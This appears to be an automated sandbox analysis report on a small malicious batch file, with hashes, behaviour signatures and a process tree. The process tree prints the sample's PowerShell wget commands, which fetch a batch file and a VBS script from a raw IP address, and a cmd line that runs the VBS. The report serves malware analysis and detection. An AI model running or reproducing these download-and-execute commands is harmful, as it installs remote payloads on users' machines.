Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
25-09-2024 18:29
Static task
static1
Behavioral task
behavioral1
Sample
4d8b2d19bdd29e6d89e0769cff9b0b48.bat
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
4d8b2d19bdd29e6d89e0769cff9b0b48.bat
Resource
win10v2004-20240802-en
General
-
Target
4d8b2d19bdd29e6d89e0769cff9b0b48.bat
-
Size
191B
-
MD5
4d8b2d19bdd29e6d89e0769cff9b0b48
-
SHA1
07c4469751a5ddf43288b8ea7d32afce71783a2c
-
SHA256
1f09edf42fa70f1d36df268eef5b64ea5617485d1a511f674740decfcebdea1e
-
SHA512
dd00356e9fdf149c9890bf71459a5e20b5bc581d62c7a3964a18aaffb32bd7e5210cc9aa8d6251e87ba4ba3ac803b5e720c66ecf161a546a4d36409d1311d3dc
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2448 powershell.exe 1300 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2448 powershell.exe Token: SeDebugPrivilege 1300 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 2000 wrote to memory of 2448 2000 cmd.exe 31 PID 2000 wrote to memory of 2448 2000 cmd.exe 31 PID 2000 wrote to memory of 2448 2000 cmd.exe 31 PID 2000 wrote to memory of 1300 2000 cmd.exe 32 PID 2000 wrote to memory of 1300 2000 cmd.exe 32 PID 2000 wrote to memory of 1300 2000 cmd.exe 32 PID 2000 wrote to memory of 2748 2000 cmd.exe 33 PID 2000 wrote to memory of 2748 2000 cmd.exe 33 PID 2000 wrote to memory of 2748 2000 cmd.exe 33
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\4d8b2d19bdd29e6d89e0769cff9b0b48.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\Admin\AppData\Roaming/ffo.bat2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2448
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\Admin\AppData\Roaming/hi.vbs2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1300
-
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Roaming/hi.vbs2⤵PID:2748
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5a3dad218a975d88b1c20ce0bb6f90d7b
SHA1890edb9063e0cbf34f76f75a77f93460cbfed008
SHA256f2a9cb4722c13c8489e9307391ba25302c718ec5448f0c8a9fbbbb4a99f0f094
SHA512fbf72072a2b934023145bf3885b649aeb3c1eaeeed21570fa5dd3f62db3f3e8e0b1177d838c6b9612267f4bdd6c457e9a82d2d284d8b80f328ecacd28d6b03cf